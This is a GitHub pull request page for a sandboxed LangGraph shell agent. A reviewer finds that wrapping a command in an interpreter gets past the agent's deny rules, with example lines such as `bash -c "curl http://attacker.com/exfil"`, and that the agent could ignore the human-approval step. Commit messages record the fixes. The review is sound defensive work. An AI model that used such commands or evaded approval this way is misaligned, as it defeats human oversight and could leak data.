feat: add sandbox_agent with per-context workspace isolation by Ladas · Pull Request #126 · kagenti/agent-examples

Ladas · 2026-02-17T11:43:49Z

Summary

New sandbox_agent LangGraph agent with sandboxed shell execution
settings.json three-tier permission checker (allow/deny/HITL)
sources.json capability declaration (registries, remotes, runtime limits)
Per-context workspace manager on shared RWX PVC
Sandbox executor with timeout enforcement
Shell, file_read, file_write tools for LangGraph
A2A server with streaming support

Tests

68 unit tests passing (permissions, sources, workspace, executor, graph)

Design Doc

See docs/plans/2026-02-14-agent-context-isolation-design.md in kagenti/kagenti repo

🤖 Generated with Claude Code

pdettori

Security & Completeness Review

Three issues identified — two security-critical and one enforcement gap. Details in inline comments below.

pdettori · 2026-02-25T02:37:58Z

+      "shell(tree:*)", "shell(pwd:*)", "shell(mkdir:*)", "shell(cp:*)",
+      "shell(mv:*)", "shell(touch:*)",
+      "shell(python:*)", "shell(python3:*)", "shell(pip install:*)",
+      "shell(pip list:*)", "shell(sh:*)", "shell(bash:*)",


🔴 Critical: Shell interpreter allow-rules bypass all deny rules

The allow list grants shell(bash:*), shell(sh:*), shell(python:*), and shell(python3:*) unconditionally. Because _match_shell() in permissions.py performs prefix-only matching on the command string, a command like:

bash -c "curl http://attacker.com/exfil" python3 -c "import subprocess; subprocess.run(['curl', ...])"

will match shell(bash:*) / shell(python3:*) in the allow list, while the deny rules shell(curl:*) and shell(wget:*) only match commands that start with curl or wget. The network(outbound:*) deny rule is typed as network, but the executor only ever calls permission_checker.check("shell", operation) — there is no code path that checks outbound network at the OS/syscall level.

This is a complete sandbox escape: any denied command can be trivially executed as a subprocess of an allowed interpreter.

Suggested fix: Either (a) remove bash/sh/python/python3 from the blanket allow-list and whitelist specific scripts instead, or (b) add recursive argument inspection in _match_shell() for interpreter commands (detecting -c flags, pipe chains, etc.), or (c) use OS-level enforcement (seccomp, network policies) as a second layer.

pdettori · 2026-02-25T02:37:58Z

+        try:
+            result = await executor.run_shell(command)
+        except HitlRequired as exc:
+            return f"APPROVAL_REQUIRED: command '{exc.command}' needs human approval."


🔴 Critical: HITL has no hard interrupt — LLM can bypass approval

The HitlRequired exception is caught here and converted to a plain string ("APPROVAL_REQUIRED: ...") returned to the LLM. There is no interrupt() call (LangGraph's mechanism for pausing the graph and requiring human input). The graph construction in build_graph() uses tools_condition and ToolNode but never calls interrupt().

This means the agent loop continues after receiving this string, and the LLM is free to:

Ignore the approval message entirely

Attempt a workaround command (e.g., rewriting the denied command using an allowed shell interpreter — see Issue 1)

Simply not relay the approval request to the user

The docstrings in executor.py and permissions.py state that HITL "triggers LangGraph interrupt() for human approval," but the actual implementation relies on LLM self-reporting. This is not a security control — it is advisory at best.

Suggested fix: Replace the except HitlRequired handler with a proper LangGraph interrupt() call that pauses the graph execution and requires explicit human approval before resuming.

pdettori · 2026-02-25T02:37:58Z

+        self.ttl_days = ttl_days
+
+    # ------------------------------------------------------------------
+    # Public API


🔴 No TTL enforcement or workspace cleanup

ttl_days is accepted here and written into .context.json metadata (line 91), but there is no implementation that ever reads this value back or acts on it. Specifically:

No cleanup job, eviction logic, or scheduled task

No delete_workspace() method exists

No comparison of created_at + ttl_days against current time

disk_usage_bytes is tracked passively but never checked against any quota

The only public methods are get_workspace_path(), ensure_workspace(), and list_contexts()

On a shared RWX PVC in a multi-tenant Kubernetes environment, this means workspaces accumulate indefinitely, creating both a resource exhaustion risk and a data retention compliance gap.

Suggested fix: Either (a) implement a cleanup_expired() method and wire it into a CronJob or startup hook, or (b) explicitly document ttl_days as advisory/future-only and add a tracking issue for enforcement.

pdettori · 2026-02-25T02:37:58Z

+        entry = managers.get(manager)
+        if entry is None:
+            return False
+        blocked: list[str] = entry.get("blocked_packages", [])


🟡 is_package_blocked() and is_git_remote_allowed() are never called in production code

These methods (and is_package_manager_enabled()) are defined and unit-tested but never wired into the executor or graph. In production code, only the following SourcesConfig members are used:

is_web_access_enabled() — called in graph.py:_make_web_fetch_tool

is_domain_allowed() — called in graph.py:_make_web_fetch_tool

max_execution_time_seconds — used in executor.py:_execute

This means:

pip install <blocked-package> will succeed if shell(pip install:*) is in the allow list — the blocked_packages list in sources.json is never consulted

git clone <disallowed-remote> will succeed if shell(git clone:*) is in the allow list — allowed_remotes in sources.json is never checked

max_memory_mb is also defined but never enforced

The sources.json capability layer was clearly designed as a second enforcement layer, but it is not wired up to the shell execution path.

Suggested fix: Either (a) add pre-execution hooks in the executor that call is_package_blocked() / is_git_remote_allowed() for matching commands, or (b) explicitly document these as "advisory only / planned for future iteration" and file tracking issues.

…L cleanup, sources enforcement Address all 4 security findings from pdettori's review on PR kagenti#126: 1. Shell interpreter bypass (Critical): Add recursive argument inspection in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags in bash/sh/python invocations. Embedded commands are checked against deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)` deny rules. 2. HITL no interrupt() (Critical): Replace `except HitlRequired` string return with LangGraph `interrupt()` call that pauses graph execution. The agent cannot continue until a human explicitly approves via the HITLManager channel. 3. No TTL enforcement (Medium): Add `cleanup_expired()` method to WorkspaceManager. Reads created_at + ttl_days from .context.json and deletes expired workspace directories. Add `get_total_disk_usage()`. 4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in SandboxExecutor.run_shell(). Checks pip/npm install commands against blocked_packages list and git clone URLs against allowed_remotes before execution. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Weather agent with ONLY auto-instrumentation - no custom middleware, no observability.py, no root span creation. The AuthBridge ext_proc creates the root span with all MLflow/OpenInference/GenAI attributes. Agent changes from pre-PR-114 baseline: - __init__.py: Add W3C Trace Context propagation + OpenAI auto-instr - agent.py: Remove duplicate LangChainInstrumentor (moved to __init__) - pyproject.toml: Add opentelemetry-instrumentation-openai - Dockerfile: Use Docker Hub base image (GHCR auth fix) Zero custom observability code - all root span attributes come from the AuthBridge ext_proc gRPC server. Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Without ASGI/Starlette instrumentation, the agent's OTEL SDK never reads the traceparent header from incoming HTTP requests. This causes the AuthBridge ext_proc root span and agent LangChain spans to end up in separate disconnected traces. StarletteInstrumentor().instrument() patches Starlette to automatically extract traceparent from incoming requests, making all agent spans children of the ext_proc root span (same trace_id). Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

New LangGraph agent with: - settings.json three-tier permission checker (allow/deny/HITL) - sources.json capability declaration (registries, remotes, limits) - Per-context workspace manager on shared RWX PVC - Sandbox executor with timeout enforcement - Shell, file_read, file_write tools for LangGraph - A2A server with streaming support 68 tests passing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Agents can now fetch content from URLs whose domain is in the sources.json allowed_domains list (github.com, api.github.com, etc). Blocked domains are checked first. HTML content is stripped to text. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Serialize LangChain messages via model_dump() and json.dumps() instead of Python str(). This produces valid JSON that the ext_proc can parse to extract GenAI semantic convention attributes (token counts, model name, tool names) without regex. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Without a checkpointer, LangGraph discards conversation state between invocations even when the same context_id/thread_id is used. This adds a shared MemorySaver instance to SandboxAgentExecutor and passes the thread_id config to graph.astream() so the checkpointer can route state per conversation thread. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

…L cleanup, sources enforcement Address all 4 security findings from pdettori's review on PR kagenti#126: 1. Shell interpreter bypass (Critical): Add recursive argument inspection in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags in bash/sh/python invocations. Embedded commands are checked against deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)` deny rules. 2. HITL no interrupt() (Critical): Replace `except HitlRequired` string return with LangGraph `interrupt()` call that pauses graph execution. The agent cannot continue until a human explicitly approves via the HITLManager channel. 3. No TTL enforcement (Medium): Add `cleanup_expired()` method to WorkspaceManager. Reads created_at + ttl_days from .context.json and deletes expired workspace directories. Add `get_total_disk_usage()`. 4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in SandboxExecutor.run_shell(). Checks pip/npm install commands against blocked_packages list and git clone URLs against allowed_remotes before execution. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

C19 (multi-conversation isolation): - Add startup cleanup of expired workspaces via cleanup_expired() - Wire context_ttl_days from Configuration into WorkspaceManager C20 (sub-agent spawning via LangGraph): - Add subagents.py with two spawning modes: - explore: in-process read-only sub-graph (grep, read_file, list_files) bounded to 15 iterations, 120s timeout - delegate: out-of-process SandboxClaim stub for production K8s clusters - Wire explore and delegate tools into the main agent graph - Update system prompt with sub-agent tool descriptions Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Address code review findings: 1. Interpreter bypass now routes to HITL when embedded commands are not explicitly denied — prevents auto-allowing unknown commands wrapped in bash -c / sh -c via the outer shell(bash:*) allow rule. 2. Parse &&, ||, ; shell metacharacters in embedded commands, not just pipes. Catches "bash -c 'allowed && curl evil.com'" patterns. 3. Replace str().startswith() path traversal checks with Path.is_relative_to() across graph.py and subagents.py to prevent prefix collision attacks (/workspace vs /workspace-evil). 4. Guard against None approval in interrupt() resume — use isinstance(approval, dict) check. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Add langgraph-checkpoint-postgres and asyncpg dependencies. Agent uses AsyncPostgresSaver when CHECKPOINT_DB_URL is set, falls back to in-memory MemorySaver for dev/test without Postgres. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Replace InMemoryTaskStore with a2a-sdk's DatabaseTaskStore (PostgreSQL) when TASK_STORE_DB_URL is set. This is A2A-generic — works for any agent framework (LangGraph, CrewAI, AG2), not just LangGraph. The A2A SDK persists tasks, messages, artifacts, and contextId at the protocol level. Any A2A agent can adopt this with the same env var. Falls back to InMemoryTaskStore when no DB URL is configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Update the A2A agent card name, skill ID, and workspace agent_name from sandbox-assistant/Sandbox Assistant to sandbox-legion/Sandbox Legion. The Python package name (sandbox_agent) stays unchanged as it's an implementation detail, not user-facing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

The DatabaseTaskStore is in a2a.server.tasks, not a2a.server.tasks.sql_store. The incorrect import path caused the agent to silently fall back to InMemoryTaskStore. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

AsyncPostgresSaver.from_conn_string() returns a context manager that can't be used in sync __init__. Instead, create an asyncpg pool and initialize the saver lazily in execute() on first call. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Both asyncpg pool (checkpointer) and SQLAlchemy engine (TaskStore) need SSL disabled when connecting to the in-cluster postgres-sessions StatefulSet which doesn't have TLS configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

LangGraph's AsyncPostgresSaver uses psycopg3, not asyncpg. Create AsyncConnectionPool from psycopg_pool and pass to saver. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

The from_conn_string context manager properly handles connection pool setup and autocommit for CREATE INDEX CONCURRENTLY. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

When models like gpt-4o-mini return content as a list of content blocks (text + tool_use), the previous code would stringify the entire list. Now properly extracts only text-type blocks for the final artifact. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

- Per-context_id asyncio.Lock serializes graph execution for same conversation (prevents stuck submitted tasks from concurrent requests) - Shell interpreter bypass detection: catches bash -c/python -c patterns and recursively checks inner commands against permissions and sources policy - TOFU verification on startup: hashes CLAUDE.md/sources.json, warns on mismatch (non-blocking) - HITL interrupt() design documented in graph.py with implementation roadmap for graph-level approval flow - Lock cleanup when >1000 idle entries to prevent memory leaks Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Agent now emits structured JSON events instead of Python str()/repr(). Each graph event is serialized with type, tools/name/content fields. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

…sk history Agent serializer: when LLM calls tools, also emit its reasoning text as a separate llm_response event before the tool_call. This shows the full chain: thinking → tool_call → tool_result → response. Backend history: aggregate messages across ALL task records for the same context_id. A2A protocol creates immutable tasks per message exchange, so a multi-turn session has N task records. We now merge them in order with user message deduplication. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

…nnections Stale asyncpg connections caused 'connection was closed in the middle of operation' errors, breaking SSE streams. Now connections are recycled every 5 min and verified before use. Signed-off-by: Ladislav Smola <lsmola@redhat.com>

…ction build_graph requires workspace_path, permission_checker, and sources_config. Provide dummy values for graph card topology introspection (no execution, just node/edge extraction). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

PermissionChecker.__init__() requires a settings dict. Pass minimal valid config for graph card introspection (no execution needed). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

- Remove _current_node instance variable, use key parameter directly - Fix O(n^2) byte concatenation in observability middleware response capture Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

OTel instrumentation errors (TypeError in OpenAI response attributes) must never crash the agent. Wrap setup_observability() to catch all exceptions and continue without tracing. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

BaseHTTPMiddleware wraps response body iterators, which causes CancelledError propagation when SSE clients disconnect. This kills the A2A event queue and prevents event delivery to the UI. Keep LangChain/OpenAI auto-instrumentation (non-intrusive). Remove the per-request root span middleware until we implement per-node span emission from AgentGraphCard processing. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

When the reporter LLM calls respond_to_user tool instead of producing text content, the serializer now extracts the response argument and emits it as reporter_output with clean content field. 5 new tests. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Add kernel-level per-session workspace isolation using raw ctypes Landlock syscalls (zero external dependencies). Each shell tool call forks a child process that applies irreversible Landlock rules restricting filesystem access to the session's workspace directory. - landlock_ctypes.py: raw syscall wrapper (x86_64 + aarch64) - landlock_probe.py: startup probe verifies kernel support - sandbox_subprocess.py: per-tool-call fork with Landlock - executor.py: wire sandboxed_subprocess behind SANDBOX_LANDLOCK env - graph.py: symlink escape fix in glob tool - Assertive: no fallback, pod fails if Landlock unavailable Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

When the PostgreSQL connection drops (pod restart, idle timeout), the AsyncPostgresSaver pool has stale connections causing every subsequent request to fail with "the connection is closed". Fix: - Add _ensure_checkpointer() with health check before each execute() - Detect OperationalError in graph retry loop, re-init checkpointer - Rebuild graph with fresh checkpointer on DB reconnect Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

The nested _run_graph() function assigns graph in the retry path, which makes Python treat it as a local variable. Without nonlocal, the first iteration fails with UnboundLocalError. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

AsyncPostgresSaver.from_conn_string() creates a single AsyncConnection that silently dies during long LLM calls (10-60s idle). Replace with AsyncConnectionPool (min=1, max=5) with connect_timeout=10s, TCP keepalives (idle=30s, interval=10s, count=3), and statement_timeout=30s. This prevents the indefinite hang when checkpoint writes hit a dead connection after Istio mesh idle timeout drops. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Use LangGraph's durability="exit" mode to checkpoint only when graph execution completes, not after every node transition. Reduces writes from ~50 per request to 1, preventing PostgreSQL connection pool exhaustion under sustained test load. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Emit TaskState.working status before graph initialization so SSE connections see data immediately. This prevents Istio/Envoy idle timeout during slow graph init (checkpointer, skills loading). Also rename local event_queue to graph_event_queue to eliminate variable shadowing with the A2A EventQueue parameter. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Warm up LLM connection and DB pool at startup (Starlette on_startup handler) instead of lazy-initializing on first request. This eliminates the 30-60s cold start penalty on the first A2A message after pod restart. Add /ready endpoint that returns 200 only after warm-up completes. Kubernetes readiness probes should use /ready instead of the agent card to ensure traffic only reaches agents with warm LLM executors. Warm-up sequence: 1. ChatOpenAI.ainvoke("ping") — verifies LLM backend is reachable 2. _ensure_checkpointer() — opens PostgreSQL connection pool 3. Sets _warmup_status["ready"] = True The warm LLM client is not cached (each request creates its own with session-specific metadata), but the connection to the LLM backend is validated, ensuring the first real request doesn't fail on connectivity. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Starlette's on_startup is a constructor parameter, not a mutable list. Use add_event_handler("startup", ...) which works across all versions. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

- Import ChatOpenAI from langchain_openai inside warmup (not in scope) - Use agent_executor (public) instead of _agent_executor (private) Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Three changes to reduce context bloat and support slower reasoning models that produce verbose <think> output: 1. Reporter context windowing: keep last 30 messages verbatim, compress older messages into a ~2K char summary. Prevents unbounded context growth in multi-turn sessions. 2. Think-tag stripping: _clean_response() strips <think>...</think> blocks from AIMessage content before storing in state. Reasoning is useful for the current LLM call but bloats state for subsequent nodes and turns. 3. _summarize_messages() helper: lightweight text-only compaction (no LLM call) that extracts key info from each message type for reporter windowing. Applied _clean_response at all node outputs: planner, executor, reflector, and reporter. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Simple tasks like "echo hello" or "ls" now skip the planner entirely: Router detects shell one-liners via _SIMPLE_CMD_RE regex and creates a single-step plan directly (no planner LLM call). The executor then sets done=True on completion, causing the reflector to skip its LLM call and route straight to the reporter. Result: 2 LLM calls (executor + reporter) instead of 4 (planner + executor + reflector + reporter) for simple tasks. Detection patterns: "Run:", "echo", "ls", "cat", "pwd", "whoami", "date", "head", "tail", "wc", "find", "grep", and any prompt starting with "Run this shell command:". Complex tasks (multi-step, analysis, RCA) still use the full planner pipeline — no behavior change for those. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

The step_selector's LLM brief for single-step plans from the router fast-path was producing misleading briefs like "Respond to the user" instead of using the actual command text. This caused the executor to skip the shell tool and return "READY: step complete". For single-step plans (plan_version==1, len(plan)==1), use the plan text directly as the executor brief without an LLM call. This reduces fast-path LLM calls from 3 to 2 (executor + reporter only). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

With SANDBOX_FORCE_TOOL_CHOICE=1, the LLM should always produce tool calls. Llama 4 Scout sometimes ignores this and returns text like "READY: step complete" instead. Previously this required a full graph loop (executor → reflector → step_selector → executor = 3 LLM calls) to retry. Fix: retry the LLM call immediately within the executor node (1 extra call). If the retry produces tool calls, use them. Otherwise fall through to the existing 2-attempt stall detection. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Ladas mentioned this pull request Feb 17, 2026

feature: Agent context isolation with sandboxed shell execution kagenti/kagenti#708

Closed

10 tasks

pdettori reviewed Feb 25, 2026

View reviewed changes

Ladas force-pushed the feat/sandbox-agent branch from 04f7cd5 to 2816bd3 Compare February 25, 2026 10:05

Ladas mentioned this pull request Feb 25, 2026

feat: agent sandbox — CRDs, proxy, Landlock, skills loading (Phases 1-9) kagenti/kagenti#758

Draft

7 tasks

Ladas and others added 19 commits February 26, 2026 16:06

fix: use a2a-sdk[http-server] for starlette/sse deps

aa3dd18

Signed-off-by: Ladislav Smola <lsmola@redhat.com>

chore: update uv.lock after adding postgresql dependencies

1649027

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

Ladas force-pushed the feat/sandbox-agent branch from ac7ba86 to 36cfc18 Compare February 26, 2026 15:06

Ladas and others added 5 commits February 26, 2026 18:42

Ladas added 8 commits March 15, 2026 18:11

fix(agent): bump default wallclock to 1h (was 10min)

f7c06eb

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

fix(agent): update wallclock docstring to match 3600s default

ef218fb

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

rubambiza mentioned this pull request Mar 16, 2026

Org Weekly Report 2026-03-09 -- 2026-03-16 kagenti/kagenti#968

Closed

Ladas added 3 commits March 16, 2026 15:00

rubambiza mentioned this pull request Mar 23, 2026

Org Weekly Report 2026-03-16 -- 2026-03-23 kagenti/kagenti#1094

Closed

rubambiza mentioned this pull request Mar 30, 2026

Org Weekly Report 2026-03-23 -- 2026-03-30 kagenti/kagenti#1110

Closed

Ladas force-pushed the feat/sandbox-agent branch 2 times, most recently from 6d11c1e to 1411636 Compare April 18, 2026 08:39

Ladas force-pushed the feat/sandbox-agent branch 2 times, most recently from be48d0d to 6a4f9c5 Compare April 19, 2026 07:55

Ladas force-pushed the feat/sandbox-agent branch from 6a4f9c5 to fc10be9 Compare April 19, 2026 11:44

Ladas added 7 commits April 20, 2026 08:45

xjacka mentioned this pull request May 11, 2026

Weekly Report 2026-05-11 kagenti/kagenti#1533

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat: add sandbox_agent with per-context workspace isolation#126

feat: add sandbox_agent with per-context workspace isolation#126
Ladas wants to merge 227 commits into
kagenti:mainfrom
Ladas:feat/sandbox-agent

Ladas commented Feb 17, 2026

Uh oh!

pdettori left a comment

Uh oh!

pdettori Feb 25, 2026

Uh oh!

pdettori Feb 25, 2026

Uh oh!

pdettori Feb 25, 2026

Uh oh!

pdettori Feb 25, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

Ladas commented Feb 17, 2026

Summary

Tests

Design Doc

Uh oh!

pdettori left a comment

Choose a reason for hiding this comment

Security & Completeness Review

Uh oh!

pdettori Feb 25, 2026

Choose a reason for hiding this comment

Uh oh!

pdettori Feb 25, 2026

Choose a reason for hiding this comment

Uh oh!

pdettori Feb 25, 2026

Choose a reason for hiding this comment

Uh oh!

pdettori Feb 25, 2026

Choose a reason for hiding this comment

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants